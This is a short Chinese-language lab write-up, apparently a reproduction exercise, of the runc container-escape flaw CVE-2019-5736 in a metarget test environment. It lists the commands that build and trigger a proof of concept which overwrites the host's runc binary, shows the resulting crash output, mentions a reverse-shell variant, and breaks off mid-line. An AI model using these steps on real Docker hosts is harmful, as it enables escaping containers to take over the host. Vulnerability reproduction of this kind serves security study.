Docker runc（CVE-2019-5736）漏洞复现与分析

安装

./metarget cnv install cve-2019-5736

实验

这里有两种POC，一种覆盖RUNC打印字符串，一种会通过覆盖RUNC达成反弹SHELL

复写打印

cd RunC-CVE-2019-5736 
docker build -t cve-2019-5736:exec_POC ./exec_POC
docker run -d --rm --name poc_ctr cve-2019-5736:exec_POC
docker exec poc_ctr bash

流程如下所示，会崩但是也写成功了

root@test:/usr/bin# docker ps
CONTAINER ID        IMAGE                    COMMAND                  CREATED             STATUS              PORTS               NAMES
0a7c7c67aa0a        cve-2019-5736:exec_POC   "/bin/bash_original …"   5 seconds ago       Up 5 seconds                            poc_ctr
root@test:/usr/bin#
root@test:/usr/bin# docker exec poc_ctr bash
runtime/cgo: pthread_create failed: Operation not permitted
SIGABRT: abort
PC=0x7fb3b4df7a7c m=0 sigcode=18446744073709551610

goroutine 0 [idle]:

goroutine 1 [ru